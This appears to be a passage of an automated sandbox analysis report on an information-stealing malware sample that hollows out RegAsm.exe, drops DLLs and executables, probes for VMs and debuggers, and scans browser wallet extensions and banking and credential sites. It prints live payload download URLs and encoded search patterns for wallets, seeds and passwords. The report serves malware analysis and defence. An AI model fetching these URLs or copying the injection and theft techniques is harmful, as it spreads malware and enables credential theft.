                        Source: C:\Users\user\Desktop\file.exeMemory allocated: 1240000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: 2FE0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: 2DE0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,2_2_0040180D
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 1249Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 2043Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\DAEBKKKEHD.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\ljhgfsd[1].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 8.1 %
                        Source: C:\Users\user\Desktop\file.exe TID: 6728Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh2_2_00410DDB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_0041543D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,2_2_00414CC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00409D1C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040D5C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040B5DF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,2_2_00401D80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040BF4D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_00415FD1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040B93F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_00415B0B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,2_2_0040CD37
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,2_2_00415142
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410FBA GetSystemInfo,wsprintfA,2_2_00410FBA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1218739|https://dbsmena.com/ljhgfsd.exe|1|kkkk|1218740|https://dbsmena.com/vdshfd.exe|1|kkkk|
                        Source: FCAAEB.2.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                        Source: FCAAEB.2.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                        Source: FCAAEB.2.drBinary or memory string: global block list test formVMware20,11696428655
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: R1218739https://dbsmena.com/ljhgfsd.exe1kkkk1218740https://dbsmena.com/vdshfd.exe1kkkk783966f7e54258
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: https://dbsmena.com/ljhgfsd.exe?
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000134D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: FCAAEB.2.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                        Source: FCAAEB.2.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                        Source: RegAsm.exe, 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: }Whttps://dbsmena.com/ljhgfsd.exea; boundary=----FBKJDGCGDAAAKECAKKJDen"
                        Source: FCAAEB.2.drBinary or memory string: AMC password management pageVMware20,11696428655
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: mT1218739|https://dbsmena.com/ljhgfsd.exe|1|kkkk|1218740|https://dbsmena.com/vdshfd.exe|1|kkkk|5jb20vdmRzaGZkLmV4ZXwxfGtra2t8ECBGCAAAAFC
                        Source: FCAAEB.2.drBinary or memory string: tasks.office.comVMware20,11696428655o
                        Source: RegAsm.exe, 00000002.00000002.3293998119.00000000012EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarec
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: https://dbsmena.com/ljhgfsd.exe
                        Source: FCAAEB.2.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                        Source: FCAAEB.2.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                        Source: FCAAEB.2.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                        Source: RegAsm.exe, 00000002.00000002.3293998119.00000000012EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                        Source: RegAsm.exe, 00000002.00000002.3298534442.0000000012C7D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\ljhgfsd[1].exe
                        Source: FCAAEB.2.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: Thttps://dbsmena.com/ljhgfsd.exeent-Disposition: form-data; name="token"
                        Source: FCAAEB.2.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                        Source: RegAsm.exe, 00000002.00000002.3293998119.00000000012EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW J5
                        Source: FCAAEB.2.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                        Source: FCAAEB.2.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                        Source: FCAAEB.2.drBinary or memory string: discord.comVMware20,11696428655f
                        Source: FCAAEB.2.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                        Source: FCAAEB.2.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                        Source: FCAAEB.2.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                        Source: RegAsm.exe, 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: ]Vhttps://dbsmena.com/ljhgfsd.exe OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.016d1cfe27783966f7e54258
                        Source: RegAsm.exe, 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: Whttps://dbsmena.com/ljhgfsd.exefCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyvchost.exe
                        Source: RegAsm.exe, 00000002.00000002.3293998119.00000000013D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /ljhgfsd.exe
                        Source: FCAAEB.2.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                        Source: FCAAEB.2.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                        Source: FCAAEB.2.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                        Source: FCAAEB.2.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                        Source: FCAAEB.2.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: Uhttps://dbsmena.com/ljhgfsd.exeent-Disposition: form-data; name="token"
                        Source: FCAAEB.2.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                        Source: FCAAEB.2.drBinary or memory string: outlook.office.comVMware20,11696428655s
                        Source: FCAAEB.2.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                        Source: FCAAEB.2.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                        Source: RegAsm.exe, 00000002.00000002.3293998119.00000000013D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: FCAAEB.2.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                        Source: FCAAEB.2.drBinary or memory string: dev.azure.comVMware20,11696428655j
                        Source: FCAAEB.2.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: https://dbsmena.com/ljhgfsd.exe)
                        Source: FCAAEB.2.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_2-78757
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_2-78773
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_2-80097
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041D016
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00418950
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004014AD mov eax, dword ptr fs:[00000030h]2_2_004014AD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040148A mov eax, dword ptr fs:[00000030h]2_2_0040148A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004014A2 mov eax, dword ptr fs:[00000030h]2_2_004014A2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00418599 mov eax, dword ptr fs:[00000030h]2_2_00418599
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041859A mov eax, dword ptr fs:[00000030h]2_2_0041859A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040884C CopyFileA,GetProcessHeap,RtlAllocateHeap,StrCmpCA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,DeleteFileA,2_2_0040884C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0041D98C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042762E SetUnhandledExceptionFilter,2_2_0042762E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0CB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6C0CB66C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0CB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6C0CB1F7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C27AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6C27AC62
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 6128, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6508, type: MEMORYSTR
                        Source: file.exe, Program.csReference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02FE2131 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_02FE2131
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_004124A8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_0041257F
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: FCD008
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040111D cpuid 2_2_0040111D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_00410DDB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_0042B0CC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,2_2_0042B1C1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_00429A50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,2_2_0042B268
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,2_2_0042B2C3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,2_2_0042AB40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,2_2_004253E3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,2_2_0042B494
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,2_2_0042749C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesA,2_2_0042B556
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_00429D6E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,2_2_0042E56F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_00427576
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_00428DC4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_0042B5E7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_0042B580
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,2_2_0042B623
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,2_2_0042E6A4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
